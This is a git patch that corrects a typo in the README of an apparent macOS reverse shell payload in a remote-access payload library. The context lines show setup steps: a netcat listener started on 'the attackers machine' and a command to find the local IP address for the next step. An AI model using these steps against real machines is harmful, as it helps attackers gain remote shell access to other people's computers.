From d355bfb37d8b9d299e4146ba4414124212d82279 Mon Sep 17 00:00:00 2001 From: Skye Jacobson <109015056+skyejacobson@users.noreply.github.com> Date: Sun, 10 Jul 2022 23:40:30 -0700 Subject: [PATCH] Update README.md --- payloads/library/remote_access/revshell_macOS/README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/payloads/library/remote_access/revshell_macOS/README.md b/payloads/library/remote_access/revshell_macOS/README.md index d2cfdec..265869f 100644 --- a/payloads/library/remote_access/revshell_macOS/README.md +++ b/payloads/library/remote_access/revshell_macOS/README.md @@ -3,7 +3,7 @@ # FIRST STEP(s): # run this on the attackers machine nc -l 'any port' -# This initialzes your computers listening protocol to look for TCP connections +# This initializes your computers listening protocol to look for TCP connections # IMPORTANT # open another Terminal window and run to obtain your computers local ip (this is important for the next step) ipconfig getifaddr en0